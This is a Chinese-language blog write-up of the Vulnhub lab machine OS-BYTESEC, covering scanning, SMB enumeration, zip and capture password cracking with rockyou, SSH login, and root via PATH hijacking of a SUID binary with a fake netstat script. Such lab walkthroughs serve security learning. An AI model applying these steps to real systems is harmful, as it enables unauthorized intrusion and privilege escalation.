【Vulnhub】靶机OS-BYTESEC

admin 2022年1月10日03:33:45安全博客评论12 views1618字阅读5分23秒阅读模式

前言

  • Vulnhub刷题简单记录

OS-BYTESEC

描述

难度:中级

标志:引导根

学习:利用 | 网络应用安全| 权限提升

https://www.vulnhub.com/entry/hacknos-os-hax,389/

OS-BYTESEC

1、可以用两种方法确认靶场的存在,扫ip

1
2
netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

1
nmap -sV -sC -A 192.168.136.150 -o os-ByteSec

3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况

1
2
3
4
5
6
gobuster dir -u http://192.168.136.150/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 2
00

dirb http://192.168.1.104/

dirsearch -u 192.168.136.150 -e* -x 403

4、通过smbmap查看共享文件,也可以用 enum4linux来全方面枚举信息

1
2
smbmap -H 192.168.136.150
enum4linux 192.168.136.150

image-20210923113852814

1
2
3
S-1-22-1-1000 Unix User\sagar (Local User)
S-1-22-1-1001 Unix User\blackjax (Local User)
S-1-22-1-1002 Unix User\smb (Local User)

5、根据主页的提示smb无密码,所以直接用smbclient登陆

image-20210923120739291

6、接着获取其中的文件

image-20210923121050981

7、破解zip密码hacker1

1
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

image-20210923121831075

1
xdg-open secret.jpg

7、破解包,发现了blackjax的密码为snowflake

1
aircrack-ng -w /usr/share/wordlist/rockyou.txt user.cap

image-20210923122502664

接着ssh登陆,一开始扫出的ssh端口为2525

image-20210923122933073

7、看看能不能suid提权

1
2
3
find / type f -perm -u=s 2>/dev/null

xxd /usr/bin/netscan | less #查看发现其调用netstat -antp 命令

8、利用环境命令的劫持,来让我们提升到root权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[email protected]:/tmp$ echo "/bin/sh" > netstat

[email protected]:/tmp$ chmod 777 netstat

[email protected]:/tmp$ ls
netstat systemd-private-bb2ad2734f824feba859caafc338a835-systemd-timesyncd.service-4xDQxg vmware-root

[email protected]:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

[email protected]:/tmp$ export PATH=/tmp:$PATH

[email protected]:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

[email protected]:/tmp$ netscan

image-20210923124344076

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:33:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【Vulnhub】靶机OS-BYTESEC http://cn-sec.com/archives/730028.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: